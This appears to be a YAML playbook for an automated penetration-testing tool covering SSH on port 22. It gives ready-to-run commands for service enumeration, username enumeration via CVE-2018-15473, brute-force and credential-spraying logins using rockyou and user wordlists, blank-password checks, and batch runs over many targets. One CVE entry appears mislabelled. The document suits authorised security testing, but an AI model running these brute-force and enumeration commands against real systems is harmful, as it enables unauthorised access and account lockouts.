id: ssh_pentesting
name: SSH Penetration Testing (Port 22)
description: Comprehensive SSH service enumeration, authentication testing, and exploitation based on HackTricks methodology
category: enumeration
risk_level: medium
batch_compatible: true

triggers:
  - id: trigger_ssh_service
    type: asset_discovered
    asset_type: service
    required_properties:
      port: 22
      protocol: { "$in": ["ssh", "tcp"] }
    required_count: 1
    priority: 4
    description: Triggers when SSH service is discovered on port 22
    deduplication:
      enabled: true
      strategy: signature_based
      signature_fields: ["host", "port"]

steps:
  - id: ssh_banner_grab
    name: SSH Banner Grabbing
    description: Identify SSH version and server details
    order: 1
    timeout_seconds: 30
    commands:
      - tool: nmap
        platforms: [linux, macos, windows]
        command: "nmap -sV -p 22 {host} -oN ssh_banner_{host}.txt"
        preferred: true
        notes: "Extract SSH version, supported algorithms, and server info"
        requires_elevation: false
      - tool: nc
        platforms: [linux, macos]
        command: "nc -vn {host} 22"
        preferred: false
        notes: "Simple banner grab with netcat"
        requires_elevation: false
      - tool: ssh-audit
        platforms: [linux, macos, windows]
        command: "ssh-audit {host}"
        preferred: true
        notes: "Comprehensive SSH configuration audit"
        requires_elevation: false

  - id: ssh_algorithm_enum
    name: SSH Algorithm Enumeration
    description: Enumerate supported ciphers, MACs, and key exchange algorithms
    order: 2
    timeout_seconds: 60
    commands:
      - tool: nmap
        platforms: [linux, macos, windows]
        command: "nmap -p 22 --script ssh2-enum-algos {host}"
        preferred: true
        notes: "List all supported SSH algorithms"
        requires_elevation: false
      - tool: nmap
        platforms: [linux, macos, windows]
        command: "nmap -p 22 --script ssh-hostkey {host}"
        preferred: true
        notes: "Retrieve SSH host keys"
        requires_elevation: false

  - id: ssh_user_enum
    name: SSH Username Enumeration
    description: Enumerate valid usernames via timing attacks (CVE-2018-15473)
    order: 3
    timeout_seconds: 300
    commands:
      - tool: nmap
        platforms: [linux, macos, windows]
        command: "nmap -p 22 --script ssh-auth-methods --script-args ssh.user={username} {host}"
        preferred: true
        notes: "Check which auth methods are available for specific users"
        requires_elevation: false
      - tool: metasploit
        platforms: [linux, macos, windows]
        command: "msfconsole -q -x 'use auxiliary/scanner/ssh/ssh_enumusers; set RHOSTS {host}; set USER_FILE /usr/share/wordlists/metasploit/unix_users.txt; run; exit'"
        preferred: false
        notes: "Username enumeration via timing attack (CVE-2018-15473)"
        requires_elevation: false

  - id: ssh_weak_keys
    name: Check for Weak SSH Keys
    description: Test for default or weak SSH keys
    order: 4
    timeout_seconds: 120
    commands:
      - tool: nmap
        platforms: [linux, macos, windows]
        command: "nmap -p 22 --script ssh-publickey-acceptance --script-args publickeys=/path/to/keys {host}"
        preferred: true
        notes: "Test if server accepts specific public keys"
        requires_elevation: false

  - id: ssh_brute_force
    name: SSH Brute Force Authentication
    description: Attempt to brute force SSH credentials
    order: 5
    timeout_seconds: 600
    commands:
      - tool: hydra
        platforms: [linux, macos, windows]
        command: "hydra -L /usr/share/wordlists/metasploit/unix_users.txt -P /usr/share/wordlists/rockyou.txt ssh://{host} -t 4 -V"
        preferred: true
        notes: "Multi-threaded SSH brute force (use with caution - may lock accounts)"
        requires_elevation: false
      - tool: medusa
        platforms: [linux, macos, windows]
        command: "medusa -h {host} -U /usr/share/wordlists/metasploit/unix_users.txt -P /usr/share/wordlists/rockyou.txt -M ssh -t 4"
        preferred: false
        notes: "Alternative brute force tool"
        requires_elevation: false
      - tool: ncrack
        platforms: [linux, macos, windows]
        command: "ncrack -p 22 -user root -P /usr/share/wordlists/rockyou.txt {host}"
        preferred: false
        notes: "Nmap's high-speed network authentication cracker"
        requires_elevation: false
      - tool: crackmapexec
        platforms: [linux, macos, windows]
        command: "crackmapexec ssh {host} -u users.txt -p passwords.txt"
        preferred: true
        notes: "Modern credential spraying tool"
        requires_elevation: false

  - id: ssh_auth_bypass
    name: SSH Authentication Bypass
    description: Test for authentication bypass vulnerabilities
    order: 6
    timeout_seconds: 120
    commands:
      - tool: nmap
        platforms: [linux, macos, windows]
        command: "nmap -p 22 --script ssh-auth-methods --script-args ssh.user=<username> {host}"
        preferred: true
        notes: "Check available authentication methods"
        requires_elevation: false
      - tool: metasploit
        platforms: [linux, macos, windows]
        command: "msfconsole -q -x 'use auxiliary/scanner/ssh/ssh_login; set RHOSTS {host}; set BLANK_PASSWORDS true; set USER_AS_PASS true; run; exit'"
        preferred: false
        notes: "Test for blank passwords and username-as-password"
        requires_elevation: false

  - id: ssh_config_audit
    name: SSH Configuration Audit
    description: Audit SSH configuration for security issues
    order: 7
    timeout_seconds: 60
    commands:
      - tool: ssh-audit
        platforms: [linux, macos, windows]
        command: "ssh-audit -n -j {host} > ssh_audit_{host}.json"
        preferred: true
        notes: "Comprehensive SSH security audit (weak ciphers, outdated algorithms, etc.)"
        requires_elevation: false
      - tool: nmap
        platforms: [linux, macos, windows]
        command: "nmap -p 22 --script ssh2-enum-algos,ssh-hostkey,ssh-auth-methods {host}"
        preferred: false
        notes: "Multi-script SSH assessment"
        requires_elevation: false

metadata:
  tools:
    - nmap
    - ssh-audit
    - hydra
    - medusa
    - crackmapexec
    - metasploit
  cves:
    - CVE-2018-15473  # Username enumeration
    - CVE-2016-20012  # LibSSH auth bypass
  references:
    - https://book.hacktricks.xyz/network-services-pentesting/pentesting-ssh
    - https://github.com/jtesta/ssh-audit
  batch_commands:
    nmap_banner: "nmap -sV -p 22 -iL {targets_file} -oN ssh_banners.txt"
    ssh_audit: "parallel -j 10 'ssh-audit {} > ssh_audit_{}.txt' :::: {targets_file}"
    crackmapexec: "crackmapexec ssh {targets} -u users.txt -p passwords.txt"
